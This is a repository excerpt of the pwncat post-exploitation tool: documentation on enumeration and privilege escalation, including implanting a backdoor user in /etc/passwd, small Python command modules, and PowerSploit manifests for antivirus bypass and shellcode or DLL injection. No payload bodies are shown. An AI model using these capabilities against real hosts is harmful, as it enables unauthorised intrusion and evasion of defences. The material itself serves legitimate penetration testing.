18 | gather enumeration facts from all other enumeration modules. Facts can be filtered by the
19 | module name or the types of facts.
20 |
21 | .. code-block:: bash
22 |
23 | # Enumerate only SUID and File Capability enumeration types
24 | (local) pwncat$ run enumerate types=file.suid,file.caps
25 | # Enumerate facts from all available modules
26 | (local) pwncat$ run enumerate
27 |
28 | Generating A Target Report
29 | --------------------------
30 |
31 | The ``report`` module utilizes the enumeration framework to generate formatted host reports.
32 | When run without any arguments, this module will gather interesting host details and render
33 | a report to the terminal. Optionally, you can specify an output file name to which a
34 | Markdown report will be written.
35 |
36 | The default report templates can be found in ``pwncat/data/reports``.
37 |
38 | .. code-block:: bash
39 |
40 | # Generate formatted report
41 | (local) pwncat$ run report
42 | # Generate a markdown report
43 | (local) pwncat$ run report output=report.md
44 |
--------------------------------------------------------------------------------
/docs/source/modules.rst:
--------------------------------------------------------------------------------
1 | Modules
2 | =======
3 |
4 | pwncat has two programmable building blocks: commands and modules. Modules are
5 | specific to an open session. They are intended to retrieve some information or
6 | make a modification to a specific target. By default, modules are loaded from
7 | the ``pwncat/modules`` directory, but more modules can be loaded from a custom
8 | location via the ``load`` command.
9 |
10 | Module Contexts
11 | ---------------
12 |
13 | You can enter a module "context" which means that any ``set`` commands will
14 | operate specifically on that module's arguments by default. This is useful
15 | when a module takes a large number of arguments or complex arguments. In
16 | this case, the local prompt prefix changes to ``([module_name])`` instead of
17 | the normal ``(local)``. The context is exited automatically after using the
18 | ``run`` command.
19 |
20 | When in a module context, commands like ``info`` and ``run`` no longer
21 | require the module name as a parameter. It is inferred by the current context.
22 |
23 | Locating Modules
24 | ----------------
25 |
26 | Modules are located using the ``search`` command at the local prompt. You can
27 | also locate modules using tab completion at the local prompt.
28 |
29 | .. code-block:: bash
30 |
31 | search enumerate.*
32 |
33 | Viewing Documentation
34 | ---------------------
35 |
36 | Module documentation can be viewed with the ``info`` command. When within
37 | a module context, the module name is inferred from the current context
38 | if not specified.
39 |
40 | .. code-block:: bash
41 |
42 | info escalate.auto
43 |
44 | Running Modules
45 | ---------------
46 |
47 | The ``run`` command is used to execute a module. The module name is inferred
48 | from the module context if not specified. Key-value parameters can be specified
49 | in the ``run`` command or with ``set`` within a module context.
50 |
51 | .. code-block:: bash
52 |
53 | run escalate.auto user=root
54 | use escalate.auto
55 | set user root
56 | run
57 |
--------------------------------------------------------------------------------
/docs/source/privesc.rst:
--------------------------------------------------------------------------------
1 | Automated Privilege Escalation
2 | ==============================
3 |
4 | pwncat has the ability to locate and exploit privilege escalation vulnerabilities. The vulnerabilities
5 | are identified through enumeration, and can be exploited through the ``escalate`` command. Internally,
6 | pwncat has two types of escalation objects. Firstly, there are abilities. These are actions
7 | which we are able to perform with the permissions of a different user on the target. The second type
8 | of objects are escalations. Escalations utilize one or more abilities to achieve a session as the
9 | targeted user.
10 |
11 | As an example, abilities could be things such as:
12 |
13 | * File Write
14 | * File Read
15 | * Binary execution
16 |
17 | Escalations could be things such as:
18 |
19 | * Executing a shell (the simplest option)
20 | * Reading user private keys and ssh-ing to localhost
21 | * Writing private keys
22 | * Implanting a backdoor user in /etc/passwd (if file-write as root is available)
23 |
24 | Invoking Privilege Escalation
25 | -----------------------------
26 |
27 | There are two ``escalate`` subcommands. In order to locate direct escalation vectors, you can use the
28 | ``list`` subcommand. This will use the enumeration framework to locate any escalations that may be
29 | possible as the active user.
30 |
31 | .. code-block:: bash
32 |
33 | # List direct escalations for any user
34 | (local) pwncat$ escalate list
35 | # List direct escalations to the specified user
36 | (local) pwncat$ escalate list -u root
37 |
38 | Escalation can be triggered with the ``run`` subcommand. This command will first attempt to escalate
39 | directly to the requested user. If no direct escalations are possible, it will try to recursively
40 | escalate through other users based on the available direct escalations.
41 |
42 | .. code-block:: bash
43 |
44 | # Escalate to root
45 | (local) pwncat$ escalate run
46 | # Escalate to a specified user
47 | (local) pwncat$ escalate run -u john
48 |
--------------------------------------------------------------------------------
/pwncat/channel/ssl_connect.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import ssl
3 |
4 | from pwncat.channel import ChannelError
5 | from pwncat.channel.connect import Connect
6 |
7 |
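class SSLConnect(Connect):
    """
    Outbound TCP channel wrapped in TLS.

    The TLS context is created with ``check_hostname = False`` and
    ``verify_mode = CERT_NONE``, so the remote listener is *not*
    authenticated: an active on-path attacker can terminate the TLS
    session themselves, and only passive observers are kept from reading
    the traffic. This is presumably deliberate because the listener on the
    other end typically presents an ad-hoc certificate; if a trusted
    certificate is available, verification should be turned on.
    """

    def __init__(self, **kwargs):
        """Forward every channel option unchanged to :class:`Connect`."""
        super().__init__(**kwargs)

    def _socket_connected(self, client):
        """
        Wrap the freshly connected plain socket in TLS, then hand the
        wrapped socket to the base class.

        :param client: an already-connected socket
        :raises ChannelError: if the handshake fails; the original error is
            kept as ``__cause__``
        """
        try:
            self.context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
            self.context.check_hostname = False
            self.context.verify_mode = ssl.VerifyMode.CERT_NONE

            # ``wrap_socket`` performs the handshake right away. Besides
            # ``SSLError`` this can raise plain socket errors (reset,
            # timeout, ...), which all derive from ``OSError``; every one
            # of them means the channel is unusable.
            client = self.context.wrap_socket(client)
        except OSError as exc:
            raise ChannelError(self, str(exc)) from exc

        super()._socket_connected(client)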
23 |
--------------------------------------------------------------------------------
/pwncat/commands/alias.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | from pwncat.util import console
4 | from pwncat.commands import Complete, Parameter, CommandDefinition
5 |
6 |
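class Command(CommandDefinition):
    """
    Alias an existing command with a new name. Specifying no alias or command
    will list all aliases. Specifying an alias with no command will remove the
    alias if it exists.
    """

    def get_command_names(self):
        """
        Return the ``PROG`` name of every registered command.

        Used as the ``choices`` callback for the ``command`` argument, which
        is also what guarantees that ``run`` always finds a match below.
        """
        return [c.PROG for c in self.manager.parser.commands]

    PROG = "alias"
    ARGS = {
        "alias": Parameter(Complete.NONE, help="name for the new alias", nargs="?"),
        "command": Parameter(
            Complete.CHOICES,
            metavar="COMMAND",
            choices=get_command_names,
            help="the command the new alias will use",
            nargs="?",
        ),
    }
    LOCAL = True

    def run(self, manager, args):
        """
        List, create or delete an alias depending on the arguments given.

        :param manager: the active manager; ``manager.parser.aliases`` is
            read and modified
        :param args: parsed arguments with ``alias`` and ``command``
        """
        if args.alias is None:
            for name, command in manager.parser.aliases.items():
                console.print(
                    f" [cyan]{name}[/cyan] \u2192 [yellow]{command.PROG}[/yellow]"
                )
        elif args.command is not None:
            # ``choices`` on the argparser guarantees exactly one match
            manager.parser.aliases[args.alias] = next(
                c for c in manager.parser.commands if c.PROG == args.command
            )
        else:
            # Removing an unknown alias is documented as a no-op, so guard
            # the ``del`` instead of letting it raise ``KeyError``.
            if args.alias in manager.parser.aliases:
                del manager.parser.aliases[args.alias]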
43 |
--------------------------------------------------------------------------------
/pwncat/commands/back.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import pwncat
3 | from pwncat.commands import CommandDefinition
4 |
5 |
class Command(CommandDefinition):
    """
    Return to the remote terminal
    """

    PROG = "back"
    ARGS = {}

    def run(self, manager: "pwncat.manager.Manager", args):
        """
        Hand control back to the remote shell.

        Raising ``EOFError`` is the protocol here: ``CommandParser.run``
        treats it exactly like a ``C-d`` at the local prompt and switches
        back to the remote prompt. Nothing is sent to the target.

        :param manager: unused
        :param args: unused; the command takes no arguments
        """
        raise EOFError()
18 |
--------------------------------------------------------------------------------
/pwncat/commands/bind.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 |
4 | from pwncat.util import console
5 | from pwncat.config import KeyType
6 | from pwncat.commands import Complete, Parameter, CommandDefinition
7 |
8 |
class Command(CommandDefinition):
    """
    Create key aliases for when in raw mode. This only works from platforms
    which provide a raw interaction (such as linux).
    """

    PROG = "bind"
    ARGS = {
        "key": Parameter(
            Complete.NONE,
            metavar="KEY",
            type=KeyType,
            help="The key to map after your prefix",
            nargs="?",
        ),
        "script": Parameter(
            Complete.NONE,
            help="The script to run when the key is pressed",
            nargs="?",
        ),
    }
    LOCAL = True

    def run(self, manager, args):
        """
        List, remove or create a key binding.

        * no ``key``: print every entry of ``manager.config.bindings``
        * ``key`` without ``script``: drop that binding if it exists
        * ``key`` and ``script``: map the key to the script

        :param manager: the active manager whose ``config.bindings`` is edited
        :param args: parsed arguments with ``key`` and ``script``
        """
        bindings = manager.config.bindings

        if args.key is None:
            for key, binding in bindings.items():
                console.print(f" [cyan]{key}[/cyan] = [yellow]{repr(binding)}[/yellow]")
            return

        if args.script is None:
            # Unbinding a key that was never bound is silently ignored
            if args.key in bindings:
                del bindings[args.key]
            return

        bindings[args.key] = args.script
41 |
--------------------------------------------------------------------------------
/pwncat/commands/exit.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import pwncat
3 | from pwncat.commands import CommandDefinition
4 |
5 |
class Command(CommandDefinition):
    """
    Exit the interactive prompt. If sessions are active, you will
    be prompted to confirm. This shouldn't be run from a configuration
    script.
    """

    PROG = "exit"
    ARGS = {}
    LOCAL = True

    def run(self, manager, args):
        """
        Leave the interactive prompt.

        The exception is the signal itself; the confirmation described in the
        class docstring is handled wherever ``InteractiveExit`` is caught,
        not here.

        :param manager: unused
        :param args: unused; the command takes no arguments
        """
        raise pwncat.manager.InteractiveExit()
19 |
--------------------------------------------------------------------------------
/pwncat/commands/help.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import textwrap
3 |
4 | import rich.box
5 | from rich.table import Table, Column
6 |
7 | import pwncat
8 | from pwncat.util import console
9 | from pwncat.commands import Complete, Parameter, CommandDefinition
10 |
11 |
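class Command(CommandDefinition):
    """
    List known commands and print their associated help documentation.
    """

    def get_command_names(self):
        """
        Yield the ``PROG`` name of every registered command.

        This runs lazily as the ``topic`` completer. Commands are created
        before ``manager.parser`` exists, so the attribute lookup may fail;
        that case is treated as "no names yet" rather than an error.
        """
        try:
            yield from [cmd.PROG for cmd in self.manager.parser.commands]
        except AttributeError:
            return

    PROG = "help"
    ARGS = {"topic": Parameter(Complete.CHOICES, choices=get_command_names, nargs="?")}
    LOCAL = True

    def run(self, manager: "pwncat.manager.Manager", args):
        """
        Print help for one command (``args.topic``) or a table of all of them.

        :param manager: the active manager; ``manager.parser.commands`` is scanned
        :param args: parsed arguments; ``topic`` is an optional command name
        """
        if args.topic:
            for command in manager.parser.commands:
                if command.PROG != args.topic:
                    continue
                if command.parser is not None:
                    command.parser.print_help()
                else:
                    # Commands with ``ARGS = None`` have no argparse parser;
                    # fall back to the class docstring, which may be missing
                    # (``dedent(None)`` would raise).
                    console.print(textwrap.dedent(command.__doc__ or "").strip())
                break
            return

        table = Table(
            Column("Command", style="green"),
            Column("Description", no_wrap=True),
            box=rich.box.SIMPLE,
        )

        for command in manager.parser.commands:
            doc = command.__doc__
            if doc is None:
                doc = ""
            else:
                # Join the docstring lines with a space (not "") so that words
                # at line breaks are not glued together; ``shorten`` collapses
                # the whitespace and truncates to one table cell.
                doc = textwrap.shorten(
                    textwrap.dedent(doc).strip().replace("\n", " "), 60
                )

            table.add_row(command.PROG, doc)

        console.print(table)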
57 |
--------------------------------------------------------------------------------
/pwncat/commands/lcd.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import os
3 | import pathlib
4 |
5 | import pwncat
6 | from pwncat.commands import Complete, Parameter, CommandDefinition
7 |
8 |
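class Command(CommandDefinition):
    """Change the local current working directory"""

    PROG = "lcd"
    ARGS = {
        "path": Parameter(Complete.LOCAL_FILE),
    }

    def run(self, manager: "pwncat.manager.Manager", args):
        """
        Change the *local* working directory to ``args.path``.

        ``~`` is expanded. A path that is not a directory, or one that exists
        but cannot be entered (e.g. permission denied), is reported through
        ``self.parser.error`` instead of propagating an exception.

        :param manager: unused; present for the command interface
        :param args: parsed arguments with a ``path`` attribute
        """
        # Expand `~`
        path = pathlib.Path(args.path).expanduser()

        # Ensure the directory exists
        if not path.is_dir():
            self.parser.error(f"{path}: not a directory")
            return

        # Change to that directory; ``is_dir`` does not prove we may enter it
        try:
            os.chdir(path)
        except OSError as exc:
            self.parser.error(f"{path}: {exc.strerror or exc}")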
28 |
--------------------------------------------------------------------------------
/pwncat/commands/leave.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | import pwncat
4 | from pwncat.commands import Complete, Parameter, CommandDefinition
5 |
6 |
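class Command(CommandDefinition):
    """
    Leave a layer of execution from this session. Layers are normally added
    as sub-shells from escalation modules.
    """

    PROG = "leave"
    ARGS = {
        "count": Parameter(
            Complete.NONE,
            type=int,
            default=1,
            nargs="?",
            help="number of layers to remove (default: 1)",
        ),
        "--all,-a": Parameter(
            Complete.NONE,
            action="store_true",
            help="leave all active layers",
        ),
    }

    def run(self, manager: "pwncat.manager.Manager", args):
        """
        Pop ``args.count`` layers (every layer with ``--all``) and resync the
        platform's notion of the current user.

        Each layer is a callable that takes the target and undoes what the
        escalation set up. ``refresh_uid`` runs in ``finally`` because a
        partial unwind (more layers requested than exist) still changes the
        effective user; the original skipped the refresh in that case.

        :param manager: the active manager; ``manager.target.layers`` is popped
        :param args: parsed arguments with ``count`` and ``all``
        """
        target = manager.target
        requested = len(target.layers) if args.all else args.count

        try:
            for _ in range(requested):
                target.layers.pop()(target)
        except IndexError:
            # Ran out of layers before ``requested`` were popped
            target.log("[yellow]warning[/yellow]: no more layers to leave")
        finally:
            target.platform.refresh_uid()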
41 |
--------------------------------------------------------------------------------
/pwncat/commands/load.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | import pwncat
4 | from pwncat.commands import Complete, Parameter, CommandDefinition
5 |
6 |
class Command(CommandDefinition):
    """
    Load modules from the specified directory. This does not remove
    currently loaded modules, but may replace modules which were already
    loaded. Also, prior to loading any specified modules, the standard
    modules are loaded. This normally happens only when modules are first
    utilized. This ensures that a standard module does not shadow a custom
    module. In fact, the opposite may happen if a custom module is defined
    with the same name as a standard module.
    """

    PROG = "load"
    ARGS = {
        "path": Parameter(
            Complete.LOCAL_FILE,
            help="Path to a python package directory to load modules from",
            nargs="+",
        )
    }
    DEFAULTS = {}
    LOCAL = True

    def run(self, manager: "pwncat.manager.Manager", args):
        """
        Hand every directory in ``args.path`` to ``manager.load_modules``.

        Loading executes the Python in those packages, so only point this at
        directories you control.

        :param manager: the active manager performing the load
        :param args: parsed arguments; ``path`` is a non-empty list of paths
        """
        directories = args.path
        manager.load_modules(*directories)
32 |
--------------------------------------------------------------------------------
/pwncat/commands/local.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import subprocess
3 |
4 | import pwncat
5 | from pwncat.commands import CommandDefinition
6 |
7 |
class Command(CommandDefinition):
    """
    Run a local shell command on your attacking machine
    """

    PROG = "local"
    ARGS = None
    LOCAL = True

    def run(self, manager: "pwncat.manager.Manager", args):
        """
        Execute ``args`` through the local shell and wait for it to finish.

        ``ARGS = None`` means the raw remainder of the prompt line reaches
        this method as a single string. It is typed by the operator at the
        local prompt, never received from the target, which is why
        ``shell=True`` is acceptable here; target-supplied text must not be
        routed through this path.

        :param manager: unused
        :param args: the command line to run, as one string
        """
        subprocess.run(args, shell=True, check=False)
19 |
--------------------------------------------------------------------------------
/pwncat/commands/lpwd.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | from pathlib import Path
3 |
4 | import pwncat
5 | from pwncat.util import console
6 | from pwncat.commands import CommandDefinition
7 |
8 |
class Command(CommandDefinition):
    """Print the local current working directory"""

    PROG = "lpwd"
    ARGS = {}

    def run(self, manager: "pwncat.manager.Manager", args):
        """
        Print the working directory of the local process.

        :param manager: unused
        :param args: unused; the command takes no arguments
        """
        cwd = Path.cwd()
        console.print(cwd)
18 |
--------------------------------------------------------------------------------
/pwncat/commands/reset.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import pwncat
3 | from pwncat.commands import CommandDefinition
4 |
5 |
class Command(CommandDefinition):
    """
    Reset the remote terminal to the standard pwncat settings. This will set
    your remote prompt and synchronize the terminal state. It will also ensure
    that the HISTFILE, PROMPT_COMMAND, and other common shell settings are setup
    properly. Run this if you ever end up in a peculiar situation on the remote
    host and are unable to reset it manually.
    """

    PROG = "reset"
    ARGS = {}
    DEFAULTS = {}
    LOCAL = False

    def run(self, manager: "pwncat.manager.Manager", args):
        """
        Placeholder: only logs that the reset is unavailable.

        TODO: port the old ``pwncat.victim.reset()`` behaviour to the
        session-based framework. Until then nothing is sent to the target.

        :param manager: the active manager, used for logging
        :param args: unused; the command takes no arguments
        """
        message = "[yellow]warning[/yellow]: reset not implemented in new framework"
        manager.log(message)
24 |
--------------------------------------------------------------------------------
/pwncat/commands/search.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import textwrap
3 |
4 | from rich import box
5 | from rich.table import Table, Column
6 |
7 | import pwncat
8 | from pwncat.util import console
9 | from pwncat.commands import Complete, Parameter, CommandDefinition
10 |
11 |
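class Command(CommandDefinition):
    """
    Search for modules whose name matches a glob pattern
    """

    PROG = "search"
    ARGS = {
        "module": Parameter(
            Complete.NONE,
            help="glob pattern",
        )
    }

    def run(self, manager: "pwncat.manager.Manager", args):
        """
        Render a table of the modules matching ``*<pattern>*``.

        :param manager: the active manager; ``manager.target`` must be set,
            since ``find_module`` is looked up on it
        :param args: parsed arguments with a ``module`` glob fragment
        """
        modules = list(manager.target.find_module(f"*{args.module}*"))

        # Names are displayed without the "agnostic." prefix and without the
        # current platform's "<name>." prefix. ``manager.target`` has already
        # been dereferenced above, so no separate ``is not None`` check is
        # needed here.
        platform_prefix = manager.target.platform.name + "."
        names = [
            module.name.removeprefix("agnostic.").removeprefix(platform_prefix)
            for module in modules
        ]

        # Size the column to what is actually displayed; ``default`` keeps an
        # empty result set from raising ``ValueError`` in ``max``.
        min_width = max((len(name) for name in names), default=0)

        table = Table(
            Column(header="Name", style="cyan", min_width=min_width),
            Column(header="Description"),
            title="Results",
            box=box.MINIMAL_DOUBLE_HEAD,
            expand=True,
        )

        for module, module_name in zip(modules, names):
            # Rich will ellipsize the column, but we need to squeeze
            # white space and remove newlines. `textwrap.shorten` is
            # the easiest way to do that, so we use a large size for
            # width.
            description = module.__doc__ if module.__doc__ is not None else ""

            table.add_row(
                f"[cyan]{module_name}[/cyan]",
                textwrap.shorten(
                    description.replace("\n", " "), width=80, placeholder="..."
                ),
            )

        console.print(table)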
61 |
--------------------------------------------------------------------------------
/pwncat/commands/shortcut.py:
--------------------------------------------------------------------------------
1 | from pwncat.commands import Complete, Parameter, CommandDefinition
2 |
3 |
class Command(CommandDefinition):
    """
    Bind a single prefix character to an existing command. Typing the
    prefix at the local prompt then runs that command.
    """

    PROG = "shortcut"
    ARGS = {
        "prefix": Parameter(
            Complete.NONE, help="the prefix character used for the shortcut"
        ),
        "command": Parameter(Complete.NONE, help="the command to execute"),
    }
    LOCAL = True

    def run(self, manager, args):
        """
        Register ``args.prefix`` as a shortcut for the command named
        ``args.command``.

        :param manager: the active manager; ``manager.parser.shortcuts`` is updated
        :param args: parsed arguments with ``prefix`` and ``command``
        """
        match = next(
            (c for c in manager.parser.commands if c.PROG == args.command), None
        )

        if match is None:
            self.parser.error(f"{args.command}: no such command")
            return

        manager.parser.shortcuts[args.prefix] = match
23 |
--------------------------------------------------------------------------------
/pwncat/commands/use.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | import pwncat
4 | from pwncat.util import console
5 | from pwncat.commands import Complete, Parameter, CommandDefinition, get_module_choices
6 |
7 |
class Command(CommandDefinition):
    """
    Set the currently used module in the config handler
    """

    PROG = "use"
    ARGS = {
        "module": Parameter(
            Complete.CHOICES,
            choices=get_module_choices,
            metavar="MODULE",
            help="the module to use",
        )
    }
    LOCAL = False

    def run(self, manager: "pwncat.manager.Manager", args):
        """
        Enter the module context for the module named exactly ``args.module``.

        :param manager: the active manager; ``manager.target`` must be set
        :param args: parsed arguments with the module name in ``module``
        """
        matches = manager.target.find_module(args.module, exact=True)
        module = next(iter(matches), None)

        if module is None:
            console.log(f"[red]error[/red]: {args.module}: no such module")
            return

        manager.target.config.use(module)
33 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/AntivirusBypass/AntivirusBypass.psd1:
--------------------------------------------------------------------------------
1 | @{
2 |
3 | # Script module or binary module file associated with this manifest.
4 | ModuleToProcess = 'AntivirusBypass.psm1'
5 |
6 | # Version number of this module.
7 | ModuleVersion = '3.0.0.0'
8 |
9 | # ID used to uniquely identify this module
10 | GUID = '7cf9de61-2bfc-41b4-a397-9d7cf3a8e66b'
11 |
12 | # Author of this module
13 | Author = 'Matthew Graeber'
14 |
15 | # Copyright statement for this module
16 | Copyright = 'BSD 3-Clause'
17 |
18 | # Description of the functionality provided by this module
19 | Description = 'PowerSploit Antivirus Avoidance/Bypass Module'
20 |
21 | # Minimum version of the Windows PowerShell engine required by this module
22 | PowerShellVersion = '2.0'
23 |
24 | # Functions to export from this module
25 | FunctionsToExport = '*'
26 |
27 | # List of all files packaged with this module
28 | FileList = 'AntivirusBypass.psm1', 'AntivirusBypass.psd1', 'Find-AVSignature.ps1', 'Usage.md'
29 |
30 | }
31 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/AntivirusBypass/AntivirusBypass.psm1:
--------------------------------------------------------------------------------
# Dot-source every .ps1 beside this module file so their functions land in
# the module scope and are exported via the manifest's FunctionsToExport.
Get-ChildItem -Path (Join-Path $PSScriptRoot '*.ps1') | ForEach-Object { . $_.FullName }
2 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/AntivirusBypass/Usage.md:
--------------------------------------------------------------------------------
1 | To install this module, drop the entire AntivirusBypass folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
2 |
3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
5 |
6 | To use the module, type `Import-Module AntivirusBypass`
7 |
8 | To see the commands imported, type `Get-Command -Module AntivirusBypass`
9 |
10 | For help on each individual command, Get-Help is your friend.
11 |
12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/CodeExecution.psd1:
--------------------------------------------------------------------------------
1 | @{
2 |
3 | # Script module or binary module file associated with this manifest.
4 | ModuleToProcess = 'CodeExecution.psm1'
5 |
6 | # Version number of this module.
7 | ModuleVersion = '3.0.0.0'
8 |
9 | # ID used to uniquely identify this module
10 | GUID = 'a8a6780b-e694-4aa4-b28d-646afa66733c'
11 |
12 | # Author of this module
13 | Author = 'Matthew Graeber'
14 |
15 | # Company or vendor of this module
16 | CompanyName = ''
17 |
18 | # Copyright statement for this module
19 | Copyright = 'BSD 3-Clause'
20 |
21 | # Description of the functionality provided by this module
22 | Description = 'PowerSploit Code Execution Module'
23 |
24 | # Minimum version of the Windows PowerShell engine required by this module
25 | PowerShellVersion = '2.0'
26 |
27 | # Functions to export from this module
28 | FunctionsToExport = '*'
29 |
30 | # List of all files packaged with this module
31 | FileList = 'CodeExecution.psm1', 'CodeExecution.psd1', 'Invoke-Shellcode.ps1', 'Invoke-DllInjection.ps1',
32 | 'Invoke-ReflectivePEInjection.ps1', 'Invoke-WmiCommand.ps1', 'Usage.md'
33 | }
34 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/CodeExecution.psm1:
--------------------------------------------------------------------------------
# Dot-source every .ps1 beside this module file so their functions land in
# the module scope and are exported via the manifest's FunctionsToExport.
Get-ChildItem -Path (Join-Path $PSScriptRoot '*.ps1') | ForEach-Object { . $_.FullName }
2 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 11.00
3 | # Visual Studio 2010
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DemoDLL", "DemoDLL\DemoDLL.vcxproj", "{F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Debug|x64 = Debug|x64
10 | Release|Win32 = Release|Win32
11 | Release|x64 = Release|x64
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|Win32.ActiveCfg = Debug|Win32
15 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|Win32.Build.0 = Debug|Win32
16 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|x64.ActiveCfg = Debug|x64
17 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|x64.Build.0 = Debug|x64
18 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|Win32.ActiveCfg = Release|Win32
19 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|Win32.Build.0 = Release|Win32
20 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|x64.ActiveCfg = Release|x64
21 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|x64.Build.0 = Release|x64
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | EndGlobal
27 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/DemoDLL.cpp:
--------------------------------------------------------------------------------
1 | // DemoDLL.cpp : Defines the exported functions for the DLL application.
2 | //
3 |
4 | #include "stdafx.h"
5 | #include "DemoDLL.h"
6 |
7 | using namespace std;
8 |
9 |
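// Exported demo: return "String DLL function is working\n\n" as a
// heap-allocated C string. The caller owns the buffer and must release it
// with delete[] from the same CRT that built this DLL.
extern "C" __declspec( dllexport ) char* StringFunc()
{
	// Compose the message in an automatic ostringstream; the original
	// allocated the stream with new and never deleted it.
	std::ostringstream stringStream;
	stringStream << "String DLL function is working" << std::endl << std::endl;

	std::string output = stringStream.str();

	// size()+1 copies the terminating NUL as well.
	char* out = new char[output.size() + 1];
	std::memcpy(out, output.c_str(), output.size() + 1);

	return out;
}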
32 |
// Exported demo with no return value: writes a fixed line to stdout.
// Output is only visible when the DLL runs in a process that has a console.
extern "C" __declspec( dllexport ) void VoidFunc()
{
	std::printf("Void DLL function is working, using printf to display. You will only see this if you run locally.\n\n");
}
38 |
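// Exported demo: return L"WString DLL function is working\n\n" as a
// heap-allocated wide C string. The caller owns the buffer and must release
// it with delete[] from the same CRT that built this DLL.
extern "C" __declspec( dllexport ) wchar_t* WStringFunc()
{
	// The original first pointed its stream at wcout and then immediately
	// re-pointed it at a heap-allocated wostringstream that was never freed;
	// a local stream removes both the dead store and the leak.
	std::wostringstream stringStream;
	stringStream << L"WString DLL function is working" << std::endl << std::endl;

	std::wstring output = stringStream.str();

	// size()+1 copies the terminating NUL as well.
	wchar_t* out = new wchar_t[output.size() + 1];
	std::wmemcpy(out, output.c_str(), output.size() + 1);

	return out;
}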
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/DemoDLL.h:
--------------------------------------------------------------------------------
1 | // The following ifdef block is the standard way of creating macros which make exporting
2 | // from a DLL simpler. All files within this DLL are compiled with the DEMODLL_EXPORTS
3 | // symbol defined on the command line. This symbol should not be defined on any project
4 | // that uses this DLL. This way any other project whose source files include this file see
5 | // DEMODLL_API functions as being imported from a DLL, whereas this DLL sees symbols
6 | // defined with this macro as being exported.
7 | #ifdef DEMODLL_EXPORTS
8 | #define DEMODLL_API __declspec(dllexport)
9 | #else
10 | #define DEMODLL_API __declspec(dllimport)
11 | #endif
12 |
13 | using namespace std;
14 |
15 | extern "C" __declspec( dllexport ) char* StringFunc();
16 | extern "C" __declspec( dllexport ) void VoidFunc();
17 | extern "C" __declspec( dllexport ) wchar_t* WStringFunc();
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/DemoDLL.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 | Header Files
29 |
30 |
31 |
32 |
33 | Source Files
34 |
35 |
36 | Source Files
37 |
38 |
39 | Source Files
40 |
41 |
42 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | DYNAMIC LINK LIBRARY : DemoDLL Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this DemoDLL DLL for you.
6 |
